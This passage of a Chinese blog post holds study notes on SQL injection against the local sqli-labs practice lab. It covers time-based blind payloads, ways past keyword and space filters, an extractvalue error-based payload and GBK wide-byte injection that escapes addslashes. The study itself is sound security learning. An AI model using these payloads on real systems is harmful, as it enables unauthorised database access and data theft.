<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">127.0</span>.<span class="number">0.1</span>/sqli-labs/less-<span class="number">5</span>/?id=<span class="number">1</span><span class="symbol">'and</span> sleep(<span class="keyword">if</span>(length(database())=<span class="number">8</span>,<span class="number">0</span>,<span class="number">5</span>))<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>这里没有延时 可以确定当前数据库长度为8</p>
<p>数据库的第一位</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://<span class="number">127.0</span>.<span class="number">0.1</span>/sqli-labs/less-<span class="number">5</span>/?id=<span class="number">1</span><span class="symbol">'and</span> sleep(<span class="keyword">if</span>(ascii(substr(database(),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">115</span>,<span class="number">0</span>,<span class="number">5</span>))<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<p>感觉和布尔的区别 就是加上了sleep if</p>
<p>后面的话就不重复造轮子了 同理！！！</p>
<p><img src="https://i.loli.net/2019/03/13/5c88d78808b5a.gif" alt="8B753C84DCF432C1F37BA72A650E89B2.gif"></p>
<h2 id="过滤注入关键词"><a href="#过滤注入关键词" class="headerlink" title="过滤注入关键词"></a>过滤注入关键词</h2><h3 id="过滤了and-or"><a href="#过滤了and-or" class="headerlink" title="过滤了and or"></a>过滤了and or</h3><p>绕过思路</p>
<ol>
<li>大小写变形 OR,Or oR</li>
<li>编码 ，hex ,url</li>
<li>添加注释/<em> or </em>/</li>
<li>利用符号and=&amp;&amp; or=||</li>
</ol>
<p>注入天书 25题 虽过滤了 or 可用此方法绕过</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/sqli-labs/less-<span class="number">25</span>/?id=<span class="number">1</span>' ||<span class="keyword">or</span> extractvalue(<span class="number">1</span>,concat(<span class="number">0</span>x7e,database()))<span class="comment">--+</span></span><br></pre></td></tr></table></figure>
<h3 id="过滤了空格"><a href="#过滤了空格" class="headerlink" title="过滤了空格"></a>过滤了空格</h3><p>mysql空白字符</p>
<figure class="highlight gcode"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">%</span><span class="number">20</span> <span class="meta">%</span><span class="number">09</span> <span class="meta">%</span><span class="number">0</span>a <span class="meta">%</span><span class="number">0</span>b <span class="meta">%</span><span class="number">0</span>c <span class="meta">%</span><span class="number">0</span>d <span class="meta">%</span>a<span class="number">0</span> <span class="comment">/**/</span> tab</span><br></pre></td></tr></table></figure>
<p>%a0 和%0b比较常用</p>
<p>%0b相当于tab键</p>
<p>书上写到 在win下测试是不能解析%a0的 我在mac下测试把%a0解析成了问号？？？%0b也无法解析 其他的还没有去试过</p>
<p>猜测部分字符只能在linux环境下</p>
<p>这里参考以前一个ctf  <a href="https://scholar10.github.io/2018/11/26/%E8%AE%B0%E8%A2%AB%E5%A4%A7%E4%BD%AC%E4%BB%AC%E5%B8%A6%E9%A3%9E%E7%9A%84%E4%B8%80%E6%AC%A1NCTF/" target="_blank" rel="noopener">滴！晨跑打卡</a></p>
<h3 id="过滤union-select"><a href="#过滤union-select" class="headerlink" title="过滤union select"></a>过滤union select</h3><ol>
<li>首先还是尝试大小写绕过</li>
<li>尝试uniunionon中间过滤后再次拼接成union 一般情况应该不会二次过滤</li>
</ol>
<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h2><p>宽字节注入主要是源于程序员设置数据库编码与PHP编码设置为不同的两个编码那么就有可能产生宽字节注入</p>
<p>例如php编码为 utf-8 而mysql的编码为gbk这就导致了宽字节注入了</p>
<p>mysql在使用gbk编码的时候，会认为两个字符为一个汉字</p>
<p>例如<code>%aa%5c</code> 就是一个<br>汉字（前一个 ascii 码大于 128 才能到汉字的范围）</p>
<p>一般情况下程序员会把接收到的预定义字符 默认前面添加一个\</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">单引号（'）= （<span class="symbol">\'</span>）</span><br><span class="line">双引号（"） = （<span class="symbol">\"</span>）</span><br><span class="line">反斜杠（<span class="symbol">\）</span> = （<span class="symbol">\\</span>）</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2019/03/15/5c8b61d4df35d.png" alt="屏幕快照 2019-03-15 下午4.26.44.png"></p>
<p>这里注入天书第32题举例前端输入<code>%df%27</code>时</p>
<p>经过<code>addslashes</code>函数转义变成了<code>%df%5c%27</code>%5c 是反斜杠</p>
<p>mysql服务器对查询语句进行编码两个字符转换成一个汉字</p>
<p><code>%df%5c</code>转换成了汉字<code>運</code>，而单引号就逃逸了出来，从而造成了注入漏洞。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/sql注入/" rel="tag"><i class="fa fa-tag"></i> sql注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/01/xss tv wp/" rel="next" title="xss tv wp">
                <i class="fa fa-chevron-left"></i> xss tv wp
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/04/01/记第一次漏洞挖掘/" rel="prev" title="记第一次漏洞挖掘">
                记第一次漏洞挖掘 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/1.jpg"
                alt="scholar(书生)" />
            
              <p class="site-author-name" itemprop="name">scholar(书生)</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">17</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index-1.html">
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index-1.html">
                  <span class="site-state-item-count">15</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/scholar10" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-globe"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.sqlsec.com/" title="国光" target="_blank">国光</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://exp10it.cn/" title="x1r0z" target="_blank">x1r0z</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://sky666sec.github.io/" title="sky" target="_blank">sky</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.admintony.com/" title="AdminTony" target="_blank">AdminTony</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.changwei.me/" title="昌维" target="_blank">昌维</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.shentoushi.top/" title="渗透师 网络安全从业者安全导航" target="_blank">渗透师 网络安全从业者安全导航</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://secsafe.github.io/" title="掌舵者" target="_blank">掌舵者</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#MySql系统函数"><span class="nav-number">1.</span> <span class="nav-text">MySql系统函数</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#基本的联合注入"><span class="nav-number">2.</span> <span class="nav-text">基本的联合注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#查询所有数据库"><span class="nav-number">2.1.</span> <span class="nav-text">查询所有数据库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询当前数据库"><span class="nav-number">2.2.</span> <span class="nav-text">查询当前数据库</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#查询数据库下的表名"><span class="nav-number">2.3.</span> <span class="nav-text">查询数据库下的表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆user表下的列"><span class="nav-number">2.4.</span> <span class="nav-text">爆user表下的列</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#爆数据"><span class="nav-number">2.5.</span> <span class="nav-text">爆数据</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#盲注"><span class="nav-number">3.</span> <span class="nav-text">盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#截取字符串常用函数"><span class="nav-number">3.1.</span> <span class="nav-text">截取字符串常用函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#布尔盲注"><span class="nav-number">3.2.</span> <span class="nav-text">布尔盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#数据库的长度"><span class="nav-number">3.2.1.</span> <span class="nav-text">数据库的长度</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#数据库名"><span class="nav-number">3.2.2.</span> <span class="nav-text">数据库名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#表名"><span class="nav-number">3.2.3.</span> <span class="nav-text">表名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#列名"><span class="nav-number">3.2.4.</span> <span class="nav-text">列名</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#数据"><span class="nav-number">3.2.5.</span> <span class="nav-text">数据</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#延时注入"><span class="nav-number">3.3.</span> <span class="nav-text">延时注入</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#过滤注入关键词"><span class="nav-number">4.</span> <span class="nav-text">过滤注入关键词</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#过滤了and-or"><span class="nav-number">4.1.</span> <span class="nav-text">过滤了and or</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#过滤了空格"><span class="nav-number">4.2.</span> <span class="nav-text">过滤了空格</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#过滤union-select"><span class="nav-number">4.3.</span> <span class="nav-text">过滤union select</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#宽字节注入"><span class="nav-number">5.</span> <span class="nav-text">宽字节注入</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">scholar(书生)</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/src/love.js"></script>
